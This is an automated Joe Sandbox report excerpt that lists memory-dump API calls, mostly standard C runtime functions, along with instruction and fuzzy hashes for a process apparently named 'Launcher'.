                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 4119006552-393685449
                                                                        • Opcode ID: 89bdc6e1b9ce21112d34b15df9127aff7eb6a94dbaa714e063140272b279ac17
                                                                        • Instruction ID: 4f25a9ba881ee55c50086e0ab4af624d189658037e11b5a1ab2a09bc2ac49722
                                                                        • Opcode Fuzzy Hash: 89bdc6e1b9ce21112d34b15df9127aff7eb6a94dbaa714e063140272b279ac17
                                                                        • Instruction Fuzzy Hash: F8B15B71C2021AEFDF1DDFA4C8819AEBBB9FF14310B164199E8156B212D770EA61CF91
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                        • String ID:
                                                                        • API String ID: 127012223-0
                                                                        • Opcode ID: b5857002bd83cab6eca016443650febf3e01eb7955d379ea44f346ba75808c43
                                                                        • Instruction ID: 3b3a2d71b746fbbd8d08fb114caf6aae75e32bf127da444333c8fba437cf58f8
                                                                        • Opcode Fuzzy Hash: b5857002bd83cab6eca016443650febf3e01eb7955d379ea44f346ba75808c43
                                                                        • Instruction Fuzzy Hash: 8E716A72920A26ABDF219F548CA1FAF77BA9F04313F680015EC05A7241F770DC688B9C
                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 0024B187
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0024B18F
                                                                        • _ValidateLocalCookies.LIBCMT ref: 0024B218
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0024B243
                                                                        • _ValidateLocalCookies.LIBCMT ref: 0024B298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        • Opcode ID: 9ea397c5b22dadf32c931760ea4ba5b3eeb4628c5d5a51706872386a277d9567
                                                                        • Instruction ID: a8d4e8c3af0d4f05676669fb5a35c8aa10af891cb80f6688eb36648ef88d28c6
                                                                        • Opcode Fuzzy Hash: 9ea397c5b22dadf32c931760ea4ba5b3eeb4628c5d5a51706872386a277d9567
                                                                        • Instruction Fuzzy Hash: 0941E634E20219ABCF19DF68C885A9E7BB4FF05324F148455EC19AB392D771EA21CF91
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(00000000,?,0024EF02,?,?,00000000,00000000,?,?,0024EC0B,00000022,FlsSetValue,00258DDC,00258DE4,00000000), ref: 0024EEB4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID: api-ms-$ext-ms-
                                                                        • API String ID: 3664257935-537541572
                                                                        • Opcode ID: 03d53581ee8e0e20fec943488ac44efc1ea25bfb425432913cd829a8508c9079
                                                                        • Instruction ID: 63c3eb3eeba15575c427e31f41cd5e4570e8868c18c30896457c82b7a9de42e4
                                                                        • Opcode Fuzzy Hash: 03d53581ee8e0e20fec943488ac44efc1ea25bfb425432913cd829a8508c9079
                                                                        • Instruction Fuzzy Hash: B621E731B21212ABEF259F20EC49A6A3769BF517B1B270111ED05E7290DB70ED20C6D4
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,0024D851,0024AF2D,0024A5C4), ref: 0024D868
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0024D876
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0024D88F
                                                                        • SetLastError.KERNEL32(00000000,0024D851,0024AF2D,0024A5C4), ref: 0024D8E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: 80a1b6b98eacf487a2435dc517a78eebdc2a7d1a55e78a951d8f2582a0f3b84e
                                                                        • Instruction ID: 35e8a62abee9f7ada0ed02c6397c25bc9b1f3c77f3b59234ff0a4ec2d3c70c38
                                                                        • Opcode Fuzzy Hash: 80a1b6b98eacf487a2435dc517a78eebdc2a7d1a55e78a951d8f2582a0f3b84e
                                                                        • Instruction Fuzzy Hash: 6E01753223D7125EE6181F75BCC9A3F2B58DF427B57200229F510550E1EE618C756A84
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0025760B,000000FF,?,0024C035,?,?,0024C0D1,00000000), ref: 0024BFA9
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0024BFBB
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,0025760B,000000FF,?,0024C035,?,?,0024C0D1,00000000), ref: 0024BFDD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: 2dea49e25f10c28c8200b08be155c03bc2dbdb2ed6cfbdd7ee686686c2a0e5aa
                                                                        • Instruction ID: a4cc777649e287f6b8a6c3a6cb47fc47f9d6e0af4969ae93cb0da869a6bb8d0e
                                                                        • Opcode Fuzzy Hash: 2dea49e25f10c28c8200b08be155c03bc2dbdb2ed6cfbdd7ee686686c2a0e5aa
                                                                        • Instruction Fuzzy Hash: 0B01A231A54719AFDB068F54EC09FAEBBB8FB04B15F054125F816A2A90DB749904CE94
                                                                        APIs
                                                                        • __alloca_probe_16.LIBCMT ref: 00252FC2
                                                                        • __alloca_probe_16.LIBCMT ref: 0025308B
                                                                        • __freea.LIBCMT ref: 002530F2
                                                                          • Part of subcall function 00250C65: HeapAlloc.KERNEL32(00000000,?,-A3400188,?,00249200,?,?,002467E7,?,00246199), ref: 00250C97
                                                                        • __freea.LIBCMT ref: 00253105
                                                                        • __freea.LIBCMT ref: 00253112
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 1096550386-0
                                                                        • Opcode ID: 67031a59e6a873cf94c7352b67d233989ef1dd768e03ece3ad1763570fecbdf8
                                                                        • Instruction ID: fa118cabc426f0cc2674c68755fbc21000f311d98e44259a49cf93a489b0e573
                                                                        • Opcode Fuzzy Hash: 67031a59e6a873cf94c7352b67d233989ef1dd768e03ece3ad1763570fecbdf8
                                                                        • Instruction Fuzzy Hash: 2451DB716206076FDF21DF70CC86DBB7AA9EF44792F154129FC08D6140EA70DE789A68
                                                                        APIs
                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0024E41E,?,?,00000000,00000000,00000000,?), ref: 0024E53D
                                                                        • CatchIt.LIBVCRUNTIME ref: 0024E623
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: CatchEncodePointer
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 1435073870-2084237596
                                                                        • Opcode ID: 96290fa6be65fafde9410d0ff9c17fb1705ad7e06f34aa49f12f5bac5ad6bf86
                                                                        • Instruction ID: bdcc3710ae00203cad191a01be62300b8e984b7b8ab37c48dc300580d6848b7e
                                                                        • Opcode Fuzzy Hash: 96290fa6be65fafde9410d0ff9c17fb1705ad7e06f34aa49f12f5bac5ad6bf86
                                                                        • Instruction Fuzzy Hash: 65419E7191010AAFDF1ADF98CC81AEE7BB9FF58304F1A8059F904A7211E335AA60DF51
                                                                        APIs
                                                                        • CopyFileW.KERNEL32(?,B9F4BBC1,00000000), ref: 0042805E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: CopyFile
                                                                        • String ID: *$*$7#v
                                                                        • API String ID: 1304948518-2346367865
                                                                        • Opcode ID: 5213059e2cf1ff3bd85a8ec57feb20daaa267110ed64e0b077f9cce5909a7b61
                                                                        • Instruction ID: 21e9a9041225b6c5ceb73ac95c0eae95b8f8785af04b964e1be19c5000155ac1
                                                                        • Opcode Fuzzy Hash: 5213059e2cf1ff3bd85a8ec57feb20daaa267110ed64e0b077f9cce5909a7b61
                                                                        • Instruction Fuzzy Hash: 7211B1B85183449FE340DF24A84571FBBE4BB9A304F544A2DF5C69A281E7B5C20A8B1B
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00252D1A,00000000,?,00261CD0,?,?,?,00252C51,00000004,InitializeCriticalSectionEx,002596F8,00259700), ref: 00252C8B
                                                                        • GetLastError.KERNEL32(?,00252D1A,00000000,?,00261CD0,?,?,?,00252C51,00000004,InitializeCriticalSectionEx,002596F8,00259700,00000000,?,0024E73C), ref: 00252C95
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00252CBD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$ErrorLast
                                                                        • String ID: api-ms-
                                                                        • API String ID: 3177248105-2084034818
                                                                        • Opcode ID: fc4fbb88cdedd620c212fb2565ec905cd23d1c7346a0778ee84474ef0df60739
                                                                        • Instruction ID: d6ebdbb95cc9d3c9adf02d7231c8e7d45b9f5d42d99e3047ee5cf4fc4ff53523
                                                                        • Opcode Fuzzy Hash: fc4fbb88cdedd620c212fb2565ec905cd23d1c7346a0778ee84474ef0df60739
                                                                        • Instruction Fuzzy Hash: 93E01230250305FAEF201F60ED0EB6C3B59AB01B57F554421FD0DB41E1E7719968995D
                                                                        APIs
                                                                        • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 0025366B
                                                                          • Part of subcall function 00252151: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,0024D7D1,?,00000000,?), ref: 002521B2
                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002538BD
                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00253903
                                                                        • GetLastError.KERNEL32 ref: 002539A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                        • String ID:
                                                                        • API String ID: 2112829910-0
                                                                        • Opcode ID: 201861cd6bf23e8de41a7bb7b5e80a5f307263eec3a2196dfe30e387ff3ff11e
                                                                        • Instruction ID: fb335ddc0cb2ffca9109233d388d7c2e5384682f45e5f45da7f9c0893cdd9d99
                                                                        • Opcode Fuzzy Hash: 201861cd6bf23e8de41a7bb7b5e80a5f307263eec3a2196dfe30e387ff3ff11e
                                                                        • Instruction Fuzzy Hash: E3D1BBB1D102489FCF15CFA8C884AADBBB8FF48311F28412AE816EB351D770AA55CF54
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPointer
                                                                        • String ID:
                                                                        • API String ID: 1740715915-0
                                                                        • Opcode ID: b9a84d0abedf36b0b926937b25d07ead403e30982e2534136c9ad853967060f1
                                                                        • Instruction ID: a92c3dea84bbd2200dfaae00011cbf8b23f87f7b9096b57b1cc6f93925755fee
                                                                        • Opcode Fuzzy Hash: b9a84d0abedf36b0b926937b25d07ead403e30982e2534136c9ad853967060f1
                                                                        • Instruction Fuzzy Hash: 1351B171624202AFFF2D9F10D841BBA77A4FF00300F264429E9166B691E7B2EC68CB51
                                                                        APIs
                                                                          • Part of subcall function 00252151: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,0024D7D1,?,00000000,?), ref: 002521B2
                                                                        • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,0025197E,?,?,?,00000000), ref: 0025163C
                                                                        • __dosmaperr.LIBCMT ref: 00251643
                                                                        • GetLastError.KERNEL32(00000000,0025197E,?,?,00000000,?,?,?,00000000,00000000,?,0025197E,?,?,?,00000000), ref: 0025167D
                                                                        • __dosmaperr.LIBCMT ref: 00251684
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                        • String ID:
                                                                        • API String ID: 1913693674-0
                                                                        • Opcode ID: de512c0ad8365e933352324ccdca09f85817dacc7445c9dbee63e34a66561cc5
                                                                        • Instruction ID: 5f6acfc630fc0401976f7756cd3c7adac9577ceec96e1ed7c98a06489e4db1bf
                                                                        • Opcode Fuzzy Hash: de512c0ad8365e933352324ccdca09f85817dacc7445c9dbee63e34a66561cc5
                                                                        • Instruction Fuzzy Hash: CE21C571620206AFDB24AF619C81E7AB7ADEF043667148518FC2997151E770EC388F98
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d9037501c78a2a2b4f55a72e737f76c0a0115f73dae90b8618e8c7a8233d3c8e
                                                                        • Instruction ID: 0492cafba340c34a7fb40d60e4d9beec81738385dff938eaad650a7068dcce02
                                                                        • Opcode Fuzzy Hash: d9037501c78a2a2b4f55a72e737f76c0a0115f73dae90b8618e8c7a8233d3c8e
                                                                        • Instruction Fuzzy Hash: 8821C07163020AAFCB20AF65DC81E6BB7ADAF0436B7104519FC1597151EB31EC388FA9
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00252255
                                                                          • Part of subcall function 00252151: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,0024D7D1,?,00000000,?), ref: 002521B2
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0025228D
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002522AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                        • String ID:
                                                                        • API String ID: 158306478-0
                                                                        • Opcode ID: ea0ed25fc7fb39fc1f91857f98b416470e6826a7598835fda760c5936cddc84a
                                                                        • Instruction ID: 34f5fea08f2dd9389c5a972b7373d43d63b75efb4ca560e0c8482b5864b3407b
                                                                        • Opcode Fuzzy Hash: ea0ed25fc7fb39fc1f91857f98b416470e6826a7598835fda760c5936cddc84a
                                                                        • Instruction Fuzzy Hash: 9F118EB5631615BB6B112B716CCDC7F295CDE56397B110025FC01E1181FA708E2E99BD
                                                                        APIs
                                                                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00254F51,00000000,00000001,00000000,?,?,002539FA,?,00000000,00000000), ref: 002557F7
                                                                        • GetLastError.KERNEL32(?,00254F51,00000000,00000001,00000000,?,?,002539FA,?,00000000,00000000,?,?,?,00253340,00000000), ref: 00255803
                                                                          • Part of subcall function 00255860: CloseHandle.KERNEL32(FFFFFFFE,00255813,?,00254F51,00000000,00000001,00000000,?,?,002539FA,?,00000000,00000000,?,?), ref: 00255870
                                                                        • ___initconout.LIBCMT ref: 00255813
                                                                          • Part of subcall function 00255835: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002557D1,00254F3E,?,?,002539FA,?,00000000,00000000,?), ref: 00255848
                                                                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00254F51,00000000,00000001,00000000,?,?,002539FA,?,00000000,00000000,?), ref: 00255828
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                        • String ID:
                                                                        • API String ID: 2744216297-0
                                                                        • Opcode ID: 1bd55e134945fdec1ac0eae1aba38c98fd4896d86c72341426006c025b9c56c0
                                                                        • Instruction ID: 61dd0dc1c605e0918ffd4b49df069076939a96917b35eeffe3535e4b72ce0bd9
                                                                        • Opcode Fuzzy Hash: 1bd55e134945fdec1ac0eae1aba38c98fd4896d86c72341426006c025b9c56c0
                                                                        • Instruction Fuzzy Hash: BCF01C36520529BBCF222F91EC0C98A3F26EB083A2F068011FE0885120D6729964EB99
                                                                        APIs
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0024DD95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ___except_validate_context_record
                                                                        • String ID: csm$csm
                                                                        • API String ID: 3493665558-3733052814
                                                                        • Opcode ID: 2b7f9347bb7ccd960ba211c5f026e36b24fd979e12f3f4a9af94d7ee7f4dadb3
                                                                        • Instruction ID: 8e62afe8f310f17c0be8f86bce747a4b7be3ec9a31038512136fcd8541681236
                                                                        • Opcode Fuzzy Hash: 2b7f9347bb7ccd960ba211c5f026e36b24fd979e12f3f4a9af94d7ee7f4dadb3
